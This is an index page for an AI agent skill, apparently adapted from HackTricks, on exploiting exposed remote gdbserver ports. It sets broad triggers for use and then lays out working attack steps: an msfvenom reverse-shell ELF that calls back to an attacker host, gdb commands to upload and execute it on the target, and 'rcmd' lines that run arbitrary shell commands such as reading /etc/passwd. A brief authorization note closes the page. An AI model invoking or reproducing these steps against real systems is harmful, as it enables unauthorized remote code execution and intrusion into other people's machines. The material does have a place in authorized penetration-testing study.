OpenSkillIndex← back to search

Hacktricks-skills pentesting-remote-gdbserver

Exploit remote gdbserver instances for pentesting. Use this skill whenever you encounter an open gdbserver port during reconnaissance, need to debug a remote process, want to upload and execute binaries on a target, or need to run arbitrary commands through a gdb connection. Trigger on mentions of gdbserver, remote debugging, port scanning results showing unknown services, or when you need to interact with a remote debugging session.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-remote-gdbserver/SKILL.MD
source content

Pentesting Remote GdbServer

This skill helps you exploit remote gdbserver instances discovered during pentesting engagements. Gdbserver allows remote debugging of programs and can be leveraged for code execution on target systems.

When to Use This Skill

  • You've discovered an open port that might be gdbserver (nmap doesn't recognize it by default)
  • You have access to a remote debugging session and need to interact with it
  • You need to upload and execute binaries on a target system
  • You want to run arbitrary commands through a gdb connection
  • You're working with a target that has debugging capabilities exposed

Basic Information

gdbserver runs alongside the program being debugged on the target system. It allows the GNU Debugger (gdb) to connect from a different machine (the host) where source code and binary copies are stored. Connections can be made over TCP or serial lines.

Key facts:

  • Gdbserver can listen on any port
  • Nmap cannot automatically recognize gdbserver services
  • You can upload files and execute commands through the debugging interface

Exploitation Method 1: Upload and Execute ELF Backdoor

This method creates a malicious ELF binary, uploads it to the target, and executes it through gdb.

Step 1: Create a Reverse Shell Binary

# Generate an ELF backdoor with msfvenom
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=<YOUR_PORT> PrependFork=true -f elf -o binary.elf

# Make it executable
chmod +x binary.elf

Step 2: Connect to Remote Gdbserver

# Start gdb with your binary
gdb binary.elf

# Set the remote debugging target
target extended-remote <TARGET_IP>:<TARGET_PORT>

Step 3: Upload and Execute

# Upload the ELF file to the target
remote put binary.elf binary.elf

# Set the remote executable file path
set remote exec-file /path/to/binary.elf

# Execute the binary (triggers reverse shell)
run

Expected result: You should receive a reverse shell connection on your listener.

Exploitation Method 2: Execute Arbitrary Commands

This method uses a custom Python script to execute arbitrary shell commands through the gdb connection.

Step 1: Prepare the Remote Command Script

Use the bundled script 

scripts/remote-cmd.py
which provides the 
rcmd
command for executing shell commands remotely.

Step 2: Connect and Load the Script

# Connect to the remote gdbserver
target extended-remote <TARGET_IP>:<TARGET_PORT>

# Load the custom gdb command
source scripts/remote-cmd.py

Step 3: Execute Commands

# Change to a trusted binary and run it
set remote exec-file /bin/bash
r

# Run until libc is loaded (e.g., start of main)
tb main
r

# Execute arbitrary commands using rcmd
rcmd ls
rcmd whoami
rcmd cat /etc/passwd
rcmd id

Common Commands

Once connected, you can execute various commands:

# System information
rcmd uname -a
rcmd hostname
rcmd cat /etc/os-release

# User and privilege information
rcmd id
rcmd whoami
rcmd groups

# File system exploration
rcmd ls -la /
rcmd find /home -type f -name "*.txt"
rcmd cat /etc/passwd

# Network information
rcmd netstat -tulpn
rcmd ss -tulpn
rcmd ip addr

# Process information
rcmd ps aux
rcmd top -bn1

Troubleshooting

Connection Issues

  • Verify the target port is actually running gdbserver
  • Check firewall rules between your machine and the target
  • Ensure you have a compatible binary for the target architecture

Command Execution Fails

  • Make sure libc is loaded before running commands (use 
    tb main
    then 
    r
    )
  • Check that the tmp file path is writable on the target
  • Verify the target has /bin/sh or /bin/bash available

Upload Fails

  • Ensure you have write permissions in the target directory
  • Try uploading to a different location (e.g., /tmp/)
  • Check available disk space on the target

Safety Notes

  • Only use this skill on systems you have explicit authorization to test
  • Document all actions taken during the engagement
  • Be aware that executing arbitrary commands can destabilize the target system
  • Clean up any files you upload after testing is complete

References